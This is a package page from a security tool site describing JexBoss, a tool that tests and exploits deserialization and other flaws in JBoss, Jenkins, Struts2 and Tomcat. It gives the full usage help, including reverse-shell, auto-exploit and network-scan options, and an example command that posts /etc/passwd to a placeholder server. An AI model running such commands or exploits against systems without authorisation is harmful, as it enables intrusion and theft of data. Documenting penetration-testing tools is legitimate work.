Loading ...
SnoopGodSNOOPGOD
Download

jexboss

Package

  • jexboss - JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms

Usage

usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates] [-mode {standalone,auto-scan,file-scan}] [--app-unserialize] [--servlet-unserialize] [--jboss] [--jenkins] [--struts2] [--jmxtomcat] [--proxy PROXY]
               [--proxy-cred LOGIN:PASS] [--jboss-login LOGIN:PASS] [--timeout TIMEOUT] [--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD] [--dns URL] [--windows] [--post-parameter PARAMETER] [--show-payload]
               [--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}] [--load-gadget FILENAME] [--force] [-host HOST] [-network NETWORK] [-ports PORTS] [-results FILENAME] [-file FILENAME_HOSTS]
               [-out FILENAME_RESULTS]
options:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector (CVE-2015-5317).
  --struts2             Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-3427). OBS: Will not be checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)
  --cookies NAME=VALUE  Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. Format: "NAME1=VALUE1; NAME2=VALUE2" (eg. --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u http://192.168.0.10:8080)
Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)
  --dns URL             Specifies the dns query for use with "dns" Gadget
  --windows, -w         Specifies that the commands are for rWINDOWS System$ (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}
                        Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types.
Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results
File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per line)
  -out FILENAME_RESULTS
                        File name to store the file scan results
Install jexboss
sudo apt install jexboss
Remove jexboss
sudo apt remove jexboss
Previousgophish
Nextlibenom

Don’t Want to Miss Anything?

Sign up for Newsletters

* Yes, I agree to the terms and privacy policy
Top